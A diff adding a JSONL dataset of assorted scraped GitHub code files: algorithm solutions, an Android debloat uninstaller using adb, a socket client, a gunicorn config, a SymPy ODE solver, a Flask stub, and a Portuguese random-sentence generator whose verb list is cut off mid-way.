diff --git "a/4921.jsonl" "b/4921.jsonl" new file mode 100644--- /dev/null +++ "b/4921.jsonl" @@ -0,0 +1,516 @@ +{"seq_id":"74886100607","text":"# https://www.acmicpc.net/problem/16987\n# 계란으로 계란치기\n\nimport sys\n\nN = int(sys.stdin.readline().rstrip())\ndfs_stack = [[list(map(int, sys.stdin.readline().rstrip().split())) for _ in range(N)] + [0]] # 마지막 : 다음에 칠 계란위치\nmax_broken = 0\nwhile len(dfs_stack) > 0:\n tmp_elem = dfs_stack.pop()\n\n if tmp_elem[-1] == N:\n now_broken = 0\n for egg in range(N):\n if tmp_elem[egg][0] <= 0:\n now_broken += 1\n max_broken = max(max_broken, now_broken)\n if max_broken == N:\n break\n continue\n\n if tmp_elem[tmp_elem[-1]][0] < 0:\n new_list = [[tmp_elem[x][s] for s in range(2)] for x in range(N)] + [tmp_elem[-1]]\n new_list[-1] += 1\n dfs_stack.append(new_list)\n continue\n\n crushed = False\n for egg_idx in range(N):\n if tmp_elem[-1] != egg_idx and tmp_elem[egg_idx][0] > 0 and tmp_elem[tmp_elem[-1]][0] > 0:\n new_list = [[tmp_elem[x][s] for s in range(2)] for x in range(N)] + [tmp_elem[-1]]\n # new_list[egg_idx]와 new_list[tmp_elem[-1]]의 충돌\n new_list[egg_idx][0] -= new_list[new_list[-1]][1]\n new_list[new_list[-1]][0] -= new_list[egg_idx][1]\n new_list[-1] += 1\n dfs_stack.append(new_list)\n crushed = True\n\n if not crushed:\n new_list = [[tmp_elem[x][s] for s in range(2)] for x in range(N)] + [tmp_elem[-1]]\n new_list[-1] += 1\n dfs_stack.append(new_list)\n\nprint(max_broken)","repo_name":"Algo-Inha/Algo-inha","sub_path":"mang5o/220927/bj-16987.py","file_name":"bj-16987.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"42"} +{"seq_id":"12172417794","text":"import numpy as np\nfrom mdsimulator.neighbor_list import NeighborList\nfrom mdsimulator.neighbor_order_pbc import create_nb_order\nfrom mdsimulator.short_ranged import potentials\n\n# n number of particles\nn = 2\nppos = np.array([[1, 2],\n [2, 4]])\nbox = (10, 10)\nparams = 3\nsigma_c = 1\nr_cut = 10\n\nnl = NeighborList(box, ppos, r_cut)\nnbs = create_nb_order(box, r_cut)\n\ne = potentials(ppos, params, sigma_c, nl, nbs, r_cut, lj=True, couloumb=True)","repo_name":"Marsll/md-simulator","sub_path":"mdsimulator/obsolete_code/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"9212608142","text":"from operator import itemgetter\nn=input(\"Enter data: \")\nl=[]\nwhile True:\n i=input()\n if i:\n l.append(tuple(i.split(',')))\n else:\n break\nprint(sorted(l,key=itemgetter(0,1,2)))\n","repo_name":"renu0028/PythonScripts","sub_path":"Sort.py","file_name":"Sort.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"70463746368","text":"import torch_npu\r\n\r\n__all__ = [\"Reducer\", \"_register_comm_hook\", \"_register_builtin_comm_hook\",\r\n \"_compute_bucket_assignment_by_size\", \"_verify_params_across_processes\", \"_broadcast_coalesced\"]\r\n\r\n\r\ndef is_available():\r\n \"\"\"\r\n Returns ``True`` if the distributed package is available. Otherwise,\r\n ``torch.distributed`` does not expose any other APIs. Currently,\r\n ``torch.distributed`` is available on Linux, MacOS and Windows. Set\r\n ``USE_DISTRIBUTED=1`` to enable it when building PyTorch from source.\r\n Currently, the default value is ``USE_DISTRIBUTED=1`` for Linux and Windows,\r\n ``USE_DISTRIBUTED=0`` for MacOS.\r\n \"\"\"\r\n return hasattr(torch_npu._C, \"_c10d_npu_init\")\r\n\r\n\r\nif is_available() and not torch_npu._C._c10d_npu_init():\r\n raise RuntimeError(\"Failed to initialize torch_npu.distributed\")\r\n\r\n\r\nfrom torch_npu._C._distributed_c10d import (\r\n Reducer,\r\n _register_comm_hook,\r\n _register_builtin_comm_hook,\r\n _compute_bucket_assignment_by_size,\r\n _verify_params_across_processes,\r\n _broadcast_coalesced\r\n)\r\n\r\n","repo_name":"Ascend/pytorch","sub_path":"torch_npu/distributed/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"42"} +{"seq_id":"31544302193","text":"from tkinter import Tk,Label,Listbox,ANCHOR ,Button ,messagebox,Scrollbar\nimport tkinter as tk\nimport adbutils\nfrom tkinter import *\n\ndef on_keyrelease(event):\n\n # get text from entry\n value = event.widget.get()\n value = value.strip().lower()\n\n # get data from list1\n if value == '':\n data = list1\n else:\n data = []\n for item in list1:\n if value in item.lower():\n data.append(item) \n\n # update data in listbox\n listbox1_update(data)\n\n\ndef listbox1_update(data):\n # delete previous data\n listbox1.delete(0, 'end')\n\n # sorting data\n data = sorted(data, key=str.lower)\n\n # put new data\n for item in data:\n listbox1.insert('end', item)\n\n\ndef on_select1():\n newitem=listbox1.get(listbox1.curselection())\n listbox2.insert(0,newitem)\n listbox1.delete(ANCHOR)\n list2.append(newitem)\n list1.remove(newitem)\n print(\"list2==\",list2)\n\ndef on_select2():\n newitem=listbox2.get(listbox2.curselection())\n listbox1.insert(0,newitem)\n listbox2.delete(ANCHOR)\n list1.append(newitem)\n list2.remove(newitem)\n print(\"list1==\",list1)\n\ndef on_select1xx(event):\n newitem=listbox1.get(listbox1.curselection())\n listbox2.insert(0,newitem)\n listbox1.delete(ANCHOR)\n list2.append(newitem)\n list1.remove(newitem)\n print(\"list2==\",list2)\n\ndef on_select2xx(event):\n newitem=listbox2.get(listbox2.curselection())\n listbox1.insert(0,newitem)\n listbox2.delete(ANCHOR)\n list1.append(newitem)\n list2.remove(newitem)\n print(\"list1==\",list1)\n\n \n\ndef on_uninstall():\n print(\"UNINSTALL IN PROGRESS...\")\n for package in list2:\n # pass\n # print(sp.getoutput('adb shell pm uninstall -k --user 0 {}'.format(package)))\n print(dev.shell('pm uninstall -k --user 0 {}'.format(package)))\n print(\"successfully uninstalled \",len(list2),\" items\")\n messagebox.showinfo(\"Title\", \"successfully uninstalled \"+str(len(list2))+\" items\")\n listbox2.delete(0,\"end\")\n list2.clear()\n\ndef on_clearall():\n list1.extend(list2)\n listbox1_update(list1)\n listbox2.delete(0,\"end\")\n list2.clear()\n\n\n\n# --- main ---\nadb = adbutils.AdbClient(host=\"127.0.0.1\", port=5037)\ndev = adb.device()\nout=dev.shell('pm list packages')\n# out = sp.getoutput('pyadb shell pm list packages')\noutput=out.replace('package:','').split('\\n')\n# list1 = ['apple', 'banana', 'Cranberry', 'dogwood', 'alpha', 'Acorn', 'Anise', 'Strawberry' ]\nlist1=output\nlist2=[]\nroot = tk.Tk()\nroot.title(\"AP's ANDROID SYSTEM APPS UNINSTALLER v1\")\n\nframe=Frame()\n\nl1= Label(frame, text=\"Search \",font=(\"\",20 ))\nentry = tk.Entry(frame,font=(\"\",20 ))\n\n\nentry.bind('', on_keyrelease)\nbtn1 = Button( text = \" > \",command=on_select1,font=(\"\",20 ))\nbtn2 = Button( text = \" < \",command=on_select2,font=(\"\",20 ))\nbtn3 = Button( text = \"UNINSTALL\",command=on_uninstall, fg='blue',font=(\"\",15,\"bold\" ))\nbtnclearall = Button( text = \"<<\",command=on_clearall,font=(\"\",20 ))\n\n\nroot.geometry(\"1366x768\")\n# l1.pack()\nframe.pack(pady=20,side=TOP)\nl1.pack(side=LEFT)\nentry.pack(side=LEFT)\nlistbox1 = tk.Listbox(root,width=30,height=20,font=(\"\",20 ))\nlistbox1.pack(side='left', ipadx=20, padx=30)\n# listbox1.place(x=200, y=200,height=800,width=300)\n\nlistbox2 = tk.Listbox(root,width=30,height=20,font=(\"\",20 ))\nlistbox2.pack(side='right', ipadx=20, padx=30)\nbtn1.pack(pady=60)\nbtn2.pack(pady=60)\nbtnclearall.pack(pady=60)\nbtn3.pack(pady=60)\n\n\n\n\nlistbox1.bind('', on_select1xx)\nlistbox2.bind('', on_select2xx)\n\n# listbox1.bind('<>', on_select)\nlistbox1_update(list1)\n\nroot.mainloop()","repo_name":"aswinpradeep/AP-s-Android-System-Apps-Uninstaller","sub_path":"AP_UNINSTALLER.py","file_name":"AP_UNINSTALLER.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"37809594645","text":"from socket import *\nimport utils.terminal as cmd\nimport colorama\n\nHOST = gethostname()\nPORT = 55551\nBUFFER_SIZE = 1024\n\n\ndef main():\n cmd.clear_screen()\n HOST = input(\"Digite o host que deseja conectar: \")\n PORT = int(input(\"Digite a porta que deseja conectar: \"))\n print('Tentando se conectar ao servidor...')\n print(f'HOST: {HOST},PORT:{PORT}')\n cmd.delay_loading(10)\n cmd.clear_screen()\n\n try:\n server = socket(AF_INET, SOCK_STREAM)\n server.connect((HOST, PORT))\n except:\n print(\n colorama.Fore.LIGHTRED_EX +\n '\\n- Não foi possível se conectar ao servidor. Ele está ativo?'\n )\n return cmd.clear_terminal_color()\n\n # Instruções para o cliente\n msg = server.recv(BUFFER_SIZE)\n while msg.decode() != 'start':\n print(msg.decode())\n msg = server.recv(BUFFER_SIZE)\n\n # Captura o nome do usuário\n print(\"\\n\")\n print(\"Digite seu nome de usuário:\")\n USER = input(\n colorama.Fore.LIGHTCYAN_EX + \" ▶ \" + colorama.Fore.RESET\n )\n server.send(f'name:{USER}'.encode())\n\n print('\\n')\n print(f\"No que você está pensando, {USER}?\")\n # Loop de interação com o servidor\n while msg.decode() != 'close':\n frase = input(\n colorama.Fore.LIGHTCYAN_EX +\n \" ▶ \" + colorama.Fore.RESET\n )\n server.send(f'{USER}:{frase}'.encode())\n\n msg = server.recv(BUFFER_SIZE)\n if msg.decode() != 'close':\n print(\n '{:>40}'.format(msg.decode()) +\n colorama.Fore.LIGHTMAGENTA_EX + ' ◀' + colorama.Fore.RESET\n )\n\n print('\\n')\n print(colorama.Fore.LIGHTRED_EX + f'- Conexão encerrada com o servidor')\n server.close()\n cmd.clear_terminal_color()\n input(\"Aperte para finalizar...\")\n\n\nmain()\n","repo_name":"igorroc/Socket","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"72734156928","text":"import os\nimport sys\nimport traceback\n\nimport newrelic.agent # See https://bit.ly/2xBVKBH\n\nnewrelic.agent.initialize() # noqa: E402\n\nworkers = 4\nworker_class = \"gevent\"\nworker_connections = 256\nbind = \"0.0.0.0:{}\".format(os.getenv(\"PORT\"))\naccesslog = \"-\"\n\non_aws = os.environ.get(\"NOTIFY_ENVIRONMENT\", \"\") in [\"production\", \"staging\", \"scratch\"]\nif on_aws:\n # To avoid load balancers reporting errors on shutdown instances, see AWS doc\n # > We also recommend that you configure the idle timeout of your application\n # > to be larger than the idle timeout configured for the load balancer.\n # > By default, Elastic Load Balancing sets the idle timeout value for your load balancer to 60 seconds.\n # https://docs.aws.amazon.com/elasticloadbalancing/latest/application/application-load-balancers.html#connection-idle-timeout\n keepalive = 75\n\n # The default graceful timeout period for Kubernetes is 30 seconds, so\n # want a lower graceful timeout value for gunicorn so that proper instance\n # shutdowns.\n #\n # Gunicorn config:\n # https://docs.gunicorn.org/en/stable/settings.html#graceful-timeout\n #\n # Kubernetes config:\n # https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/\n graceful_timeout = 20\n\n\ndef on_starting(server):\n server.log.info(\"Starting Notifications API\")\n\n\ndef worker_abort(worker):\n worker.log.info(\"worker received ABORT {}\".format(worker.pid))\n for threadId, stack in sys._current_frames().items():\n worker.log.error(\"\".join(traceback.format_stack(stack)))\n\n\ndef on_exit(server):\n server.log.info(\"Stopping Notifications API\")\n\n\ndef worker_int(worker):\n worker.log.info(\"worker: received SIGINT {}\".format(worker.pid))\n","repo_name":"cds-snc/notification-api","sub_path":"gunicorn_config.py","file_name":"gunicorn_config.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"42"} +{"seq_id":"8249308264","text":"from sympy import * \nfrom sympy.abc import x \nfrom sympy.parsing import parse_expr \nfrom sympy.parsing.latex import parse_latex\n\nfrom solvers.sys_solvers.solve_linear import *\n\ndef solveReducibleToLinear(odeString, user_type): \n try:\n odeLeftString = odeString.split(\"=\")[0]\n odeRightString = odeString.split(\"=\")[1]\n\n odeLeftSym = parse_expr(odeLeftString)\n odeRightSym = parse_expr(odeRightString)\n\n y = Function('y')\n equation = Eq(odeLeftSym - odeRightSym, 0)\n\n solveArray = []\n\n left = equation.args[0]\n exp = solve(left, Derivative(y(x), x))\n aux = expand(exp[0])\n\n left = Derivative(y(x), x)\n\n functionF = parse_expr(\"0\")\n functionG = parse_expr(\"0\")\n\n n = Integer(0)\n\n aux = Mul(aux, Pow(y(x), Integer(-1)))\n aux = simplify(aux)\n\n for term in aux.args:\n if 'y' in str(term):\n for subTerm in term.args:\n if 'y' in str(subTerm):\n if type(subTerm) is Pow:\n n = Add(subTerm.args[1], Integer(1))\n subG = Mul(term, Pow(subTerm, Integer(-1)))\n functionG = Add(functionG, subG)\n else:\n n = 2\n subG = Mul(term, Pow(subTerm, Integer(-1)))\n functionG = Add(functionG, subG)\n else:\n functionF = Add(functionF, term)\n \n print(functionF)\n print(functionG)\n\n step = []\n step.append(\"- Identify the reducible to linear equation, its parts and degree\" + \"\\\\\\\\ \\\\\\\\\")\n subSteps = []\n h0 = \"From the equation its degree is given by: \" + str(n) + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(h0)\n\n h0 = \"Dividing the original equation by y raised to \" + str(n) + \": \\\\\\\\ \\\\\\\\\"\n subSteps.append(h0)\n\n newEquation = simplify(Mul(odeLeftSym, Pow(Function('y')(x), -1*n)))\n e0 = \"$\" + latex(newEquation) +\" = 0$\" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(e0)\n\n functionF2 = Mul(functionF, Integer(Add(Integer(1), Mul(Integer(-1), n))))\n functionG2 = Mul(functionG, Integer(Add(Integer(1), Mul(Integer(-1), n))))\n print(functionF2)\n print(functionG2)\n\n u = Function('u')\n\n h1 = \"Finding the right substitution in the parameter u(x)\" + \"\\\\\\\\ \\\\\\\\ \"\n subSteps.append(h1)\n\n e1 = \"$\" + \"u(x) = y^{1-n}\" +\"$\" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(e1)\n\n e2 = \"$\" + \"\\\\frac{1}{1-n}\\\\frac{du}{dx} = \\\\frac{dy}{dx}y^{-n}\" + \"$\" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(e2)\n\n haux = \"Applying with n = \" + str(n)\n subSteps.append(haux)\n\n e3 = \"$\" + \"u(x) = y^{\" + str(1-n) + \"}$\" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(e3)\n\n e4 = \"$\" + \"\\\\frac{1}{\" + str(1-n) + \"}\\\\frac{du}{dx} = \\\\frac{dy}{dx}y^{\" + str(-1*n) + \"}\" + \"$\" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(e4)\n\n h2 = \"Substituting into the equation, yields \" + \"\\\\\\\\ \\\\\\\\ \"\n subSteps.append(h2)\n\n equation = Eq(Add(Derivative(u(x), x), Mul(functionF2, u(x))), -1*functionG2)\n\n h3 = \"$\" + latex(equation) + \"$\" + \"\\\\\\\\ \\\\\\\\ \"\n subSteps.append(h3)\n\n h4 = \"Which is linear\" + \"\\\\\\\\ \\\\\\\\ \"\n subSteps.append(h4)\n\n step.append(subSteps)\n solveArray.append(step)\n\n odeStringEqLeft = equation.args[0]\n odeStringEqRigth = equation.args[1]\n odeStringLinear = str(odeStringEqLeft) + \"=\" + str(odeStringEqRigth)\n\n solveFromLinear = solveLinear(odeStringLinear, 'u', user_type)\n solveArray += solveFromLinear[1]\n solveForU = solveFromLinear[2]\n print(solveForU)\n\n '''\n ------------------------------------------------------\n # Step 02: Get Explicit Solve\n ------------------------------------------------------\n '''\n solveArray.append([])\n step = solveArray[len(solveArray) - 1]\n step.append(\"- Undo the variable change\" + \"\\\\\\\\ \\\\\\\\\")\n step.append([])\n subSteps = step[1]\n \n global finalSolve\n finalSolve = []\n\n if (len(solveForU)) > 0:\n try:\n for singleSolveForU in solveForU:\n finalSolve.append(Pow(singleSolveForU, 1/(1-n))) \n\n for singleSolve in finalSolve:\n eq1s6 = Eq(y(x), singleSolve)\n subSteps.append(\"$\" + latex(eq1s6) + \"$\" + \"\\\\\\\\ \\\\\\\\\") \n\n # Analytic intervention for all the single solves if is teacher\n if (user_type == 'teacher'):\n print(\"Teacher\")\n try:\n roots = []\n roots_process = PropagatingThread(target = get_roots, args = [singleSolve, roots])\n roots_process.start()\n roots_process.join(timeout = 3)\n\n h0 = \"Whose roots are: \" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(h0) \n subIndex = 1\n for root in roots:\n eq0 = \"$\" + \"x_{\" + str(subIndex) + \"} = \" + latex(root) + \"$\" + \"\\\\\\\\ \\\\\\\\\"\n subIndex = subIndex + 1\n subSteps.append(eq0)\n\n except Exception as e:\n print(\"Error with roots\")\n print(e)\n\n try:\n critics = []\n critics_process = PropagatingThread(target = max_min, args = [singleSolve, critics])\n critics_process.start()\n critics_process.join(timeout = 3)\n\n h0 = \"Whose critics are: \" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(h0)\n subIndex = 1\n for critic in critics:\n eq0 = \"$\" + \"x_{\" + str(subIndex) + \"} = \" + latex(critic) + \"$\" + \"\\\\\\\\ \\\\\\\\\"\n subIndex = subIndex + 1\n subSteps.append(eq0)\n\n except Exception as e:\n print(\"Error with critics\")\n print(e)\n\n try:\n inflexions = []\n inflexions_process = PropagatingThread(target = inflexion_points, args = [singleSolve, inflexions])\n inflexions_process.start()\n inflexions_process.join(timeout = 3)\n\n h0 = \"Whose inflexions are: \" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(h0)\n subIndex = 1\n for inflexion in inflexions:\n eq0 = \"$\" + \"x_{\" + str(subIndex) + \"} = \" + latex(inflexion) + \"$\" + \"\\\\\\\\ \\\\\\\\\"\n subIndex = subIndex + 1\n subSteps.append(eq0)\n\n except Exception as e:\n print(\"Error with inflexions\")\n print(e)\n\n if (user_type == \"teacher\"):\n '''\n ------------------------------------------------------\n # Step 07: Generate Plot\n ------------------------------------------------------\n '''\n solveArray.append([])\n step = solveArray[len(solveArray) - 1]\n step.append(\"- Graphs\" + \"\\\\\\\\ \\\\\\\\\")\n step.append([])\n subSteps = step[1]\n\n for singleSolve in finalSolve:\n # Add plot step to solution\n print(\"Creating plot\")\n\n try:\n plot_string = create_plot(singleSolve)[1:]\n plot_string = plot_string.replace(\"\\\\n\", \"\")\n except Exception as e:\n print(e)\n\n subSteps.append(plot_string)\n print(\"Plot appended\") \n \n except:\n subSteps.append(\"Can not get the explicit solution solving for y\" + \"\\\\\\\\ \\\\\\\\\")\n\n def display_step(step):\n stepStr = \"\"\n for subStep in step:\n stepStr += str(subStep)\n return stepStr\n\n def display_solve(solveArray):\n solveStr = \"\"\n for stepAux in solveArray:\n if len(stepAux) != 0:\n solveStr += stepAux[0]\n solveStr += display_step(stepAux[1])\n else:\n solveArray.remove(stepAux)\n return solveStr \n\n return [ display_solve(solveArray), solveArray ] \n \n except CompletenessAnomaly as ca:\n \n if ca.partial_solution[0][0] == \"partial integral\":\n step = solveArray[len(solveArray) - 1]\n subSteps = step[1]\n subSteps.append(\"-------------------------------\" + \"\\\\\\\\ \\\\\\\\\")\n\n for int_substep in ca.partial_solution[0][1]:\n subSteps.append(int_substep[\"text\"] + \"\\\\\\\\ \\\\\\\\\")\n subSteps.append(int_substep[\"symbol\"] + \"\\\\\\\\ \\\\\\\\\")\n subSteps.append(\"-------------------------------\" + \"\\\\\\\\ \\\\\\\\\")\n\n ca.set_partial_solution(solveArray)\n raise ca\n","repo_name":"buronsuave/pwa-ode-project-server","sub_path":"solvers/sys_solvers/solve_reducible_linear.py","file_name":"solve_reducible_linear.py","file_ext":"py","file_size_in_byte":8243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"9279018828","text":"T = int(input())\nfor tc in range(1, T+1):\n N, M, K, H = map(int, input().split())\n land = [list(map(int, input().split())) for _ in range(N)]\n\n\n possible = 0\n for i in range(N - 2):\n for j in range(M - 2):\n space = [[0] * 3 for _ in range(3)]\n for k in range(3):\n for l in range(3):\n space[k][l] += land[i+k][j+l]\n\n min_num = space[0][0]\n max_num = space[0][0]\n for q in range(3):\n for w in range(3):\n if q != 1 or w != 1:\n if min_num > space[q][w]:\n min_num = space[q][w]\n if max_num < space[q][w]:\n max_num = space[q][w]\n\n\n if max_num - min_num <= K and min_num <= space[1][1] and space[1][1] - min_num <= H:\n possible += 1\n\n print('#{} {}'.format(tc, possible))","repo_name":"arinj9508/algorithm","sub_path":"2.7/우주선착륙.py","file_name":"우주선착륙.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"41777349899","text":"import os\nimport json\nimport pickle as pkl\n\nimport torch\nimport torchvision.transforms as Transforms\n\nfrom ...utils.config import BaseConfig, getConfigFromDict, getDictFromConfig\n\nclass BaseTrainer():\n \"\"\"\n a class to manage model training.\n \"\"\"\n\n def __init__(self,\n pathdb,\n dataloader=None,\n dbType=\"image\",\n targets=[\"\"],\n useGPU=True,\n config=None,\n lossIterEvaluation=1, # TODO: change back to 200\n saveIter=5000,\n checkPointDir=None,\n modelLabel=\"\"):\n \"\"\"\n Initializer for all trainers\n \"\"\"\n\n # Parameters\n # Training dataset parameters\n self.path_db = pathdb\n self.db_type = dbType\n self.targets = targets\n\n # set up dataloader for training\n self.dataloader = dataloader\n\n if config is None:\n config = {}\n\n # Load training configuration\n self.readTrainConfig(config)\n\n # Model Initialization\n self.useGPU = useGPU\n\n if not self.useGPU:\n self.numWorkers = 1\n\n # Internal state\n self.runningLoss = {}\n self.startScale = 0\n self.startIter = 0\n self.lossProfile = []\n\n self.initModel()\n\n # set checkpoint parameters\n self.checkPointDir = checkPointDir\n self.modelLabel = modelLabel\n self.saveIter = saveIter\n self.pathLossLog = None\n\n # Loss printing\n self.lossIterEvaluation = lossIterEvaluation\n\n def readTrainConfig(self, config):\n \"\"\"\n load a permanent configuration describing a model.\n variables described here should remain constant through the training.\n \"\"\"\n self.modelConfig = BaseConfig()\n getConfigFromDict(self.modelConfig, config, self.getDefaultConfig())\n\n def getDefaultConfig(self):\n \"\"\"the default config to load should be implemented here\"\"\"\n pass\n\n def initModel(self):\n \"\"\"the model should be initialized here\"\"\"\n pass\n\n def updateRunningLosses(self, allLosses):\n\n for name, value in allLosses.items():\n\n if name not in self.runningLoss:\n self.runningLoss[name] = [0, 0]\n\n self.runningLoss[name][0]+= value\n self.runningLoss[name][1]+=1\n\n def resetRunningLosses(self):\n\n self.runningLoss = {}\n\n def updateLossProfile(self, iter):\n\n nPrevIter = len(self.lossProfile[-1][\"iter\"])\n self.lossProfile[-1][\"iter\"].append(iter)\n\n newKeys = set(self.runningLoss.keys())\n existingKeys = set(self.lossProfile[-1].keys())\n\n toComplete = existingKeys - newKeys\n\n for item in newKeys:\n\n if item not in existingKeys:\n self.lossProfile[-1][item] = [None for x in range(nPrevIter)]\n\n value, stack = self.runningLoss[item]\n self.lossProfile[-1][item].append(value /float(stack))\n\n for item in toComplete:\n if item in [\"scale\", \"iter\"]:\n continue\n self.lossProfile[-1][item].append(None)\n\n def getDBLoader(self, scale):\n \"\"\"\n Load the training dataset for the given scale.\n\n Args:\n\n - scale (int): scale at which we are working\n\n Returns:\n\n A dataset with properly resized inputs.\n \"\"\"\n # prepare parameters for the dataloader\n # size\n size = self.model.getSize()\n\n print(\"size\", size)\n print(\"loading {} dataset\".format(self.db_type))\n\n dataset = self.dataloader.getDataset(self.path_db, self.targets, size, self.modelConfig)\n \n print(\"%d images detected\" % int(len(dataset)))\n \n return torch.utils.data.DataLoader(dataset,\n batch_size=self.modelConfig.miniBatchSize,\n shuffle=True, num_workers=self.model.n_devices)\n \n def inScaleUpdate(self, iter, scale, inputs_real):\n return inputs_real\n\n def trainOnEpoch(self,\n dbLoader,\n scale,\n shiftIter=0,\n maxIter=-1):\n pass\n\n def train(self):\n pass","repo_name":"ongyongzheng/generative_encoder","sub_path":"models/networks/base/base_trainer.py","file_name":"base_trainer.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"6768170141","text":"import os\nfrom flask import Flask\n\napp = Flask(__name__)\n\n\ndef image_to_array(data):\n\n d = data['data']\n\n outputs = {}\n\n if 'url' in d:\n image = url_to_image(d['url'])\n\n try:\n if len(image.shape)==2:\n image = cv2.merge((image,image,image))\n except:\n print('image in 2d but cant convert ot 3d')\n\n try:\n trans_mask = image[:,:,3] == 0\n image[trans_mask] = [255, 255, 255, 255]\n image = cv2.cvtColor(image, cv2.COLOR_BGRA2BGR)\n except:\n ans = 0\n\n try:\n if image.shape[0] > 100 or image.shape[1] > 100:\n\n\n image = cv2.resize(image,(512,512),interpolation=cv2.INTER_CUBIC)\n\n image = image.astype('float32')/255.0\n\n image = np.expand_dims(image, axis=0)\n\n\n\n ans = np.argmax(model.predict(image))\n else:\n ans = 0\n except:\n ans = 0\n\n\ndef video_to_image(filen):\n\n try:\n hdr = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n\n f1 = './app/data/abc.png'\n req = urllib.request.Request(filen, headers=hdr)\n req = urllib.request.urlopen(req, timeout=5)\n\n f = open(f1, 'wb')\n f.write(req.read())\n f.close()\n\n image = cv2.imread('./app/data/abc.png', cv2.IMREAD_GRAYSCALE)\n image = cv2.resize(image,(224, 224))\n os.remove('./app/data/abc.png')\n except:\n image = None\n\n return image\n\n\n@app.route(\"/\")\ndef main(): \n video_to_image = None\n #video_to_image(received.JS.data)\n return \"\"\n\n@app.route('/api')\ndef hello():\n image_to_array = None\n #image_to_array(response.JS.stream)\n return \"\"\n\nif __name__ == \"__main__\":\n print(\"API pointed to hitAPI\")\n app.run(host=\"0.0.0.0\", port=8080)","repo_name":"rahul2240/gesture-det","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"13219075310","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 1 19:27:49 2020\n\n@author: allan\n\"\"\"\nwhile True:\n import random\n verbos = [\"comeu \",\"tomou \",\"pulou \",\"entrou n\",\"pintou \",\"estudou \",\"vendeu \",\n \"assistiu \",\"olhou \",\"desconfiou d\",\"deu em cima d\",\"mordeu \",\n \"lambeu \",\"chamou \",\"abriu \",\"estudou \",\"conheceu \",\"brincou com \",\n \"mexeu n\",\"recebeu \",\"achou \",\"acordou \",\"pegou \",\"bateu n\",\n \"apanhou d\",\"matou \",\"mandou \",\"desejou \",\"lavou \",\"mudou \",\n \"sonhou com \",\"pagou \",\"fechou \",\"permitiu \",\"sentou em cima d\",\n \"sentou em cima d\",\"sentou em cima d\",\"sentou em cima d\",\"sentou em cima d\",\n \"encheu \",\"ligou \",\"agradeceu \",\"convidou \",\"entregou \",\"beijou \",\n \"apresentou \",\"ensinou para \",\"perguntou sobre \",\"penteou \",\"escovou \",\n \"passou a mão n\",\"apagou \",\"amou \",\"viu \",\"escutou \",\"escreveu sobre \",\n \"andou em cima d\",\"dormiu em cima d\",\"vomitou em cima d\",\"pensou n\",\"jogou \",\"trabalhou \",\n \"subiu n\",\"construiu \",\"tirou \",\"gostou d\",\"prendeu \",\"roeu \",\n \"varreu \",\"limpou \",\"plantou \",\"regou \",\"acompanhou \",\"aumentou \",\n \"distraiu \",\"defendeu \",\"lutou com \",\"amassou \",\"quebrou \",\"cozinhou \",\n \"virou \",\"cobriu \",\"varreu \",\"maquiou \",\"escondeu \",\"trocou \",\n \"desenhou \",\"engoliu \",\"invadiu \",\"scaneou \",\"cheirou \",\"lambuzou \",\n \"cuspiu n\",\"encarou \",\"abaixou \",\"hidratou \",\"celebrou \",\n \"calculou \",\"xingou \",\"sugou \",\"apontou para \",\"tatuou \",\"navegou \",\n \"entupiu \",\"hackeou \",\"furou \",\"esculpiu \",\"fotografou \",\"chupou \",\n \"arrastou \",\"encaixou \",\"rodeou \",\"espantou \",\"imitou \",\"remou \",\n \"ressucitou \",\"estranhou \",\"curtiu\",\"gritou com \",\"espalhou \",\n \"buzinou para \",\"sorriu para \",\"babou n\",\"seduziu \",\"manchou \",\n \"enfiou \",\"cavalgou \",\"absorveu \",\"afundou \",\"alinhou \",\"dirigiu \",\n \"flagrou \",\"infectou \",\"arrotou \",\"enterrou \",\"encostou n\",\n \"deu banho n\",\"levou \",\"traficou \",\"desenterrou \",\"bombardeou \",\n \"fincou \",\"pediu para \",\"ateou fogo n\",\"defenestrou \",\n \"maquiou \",\"secou 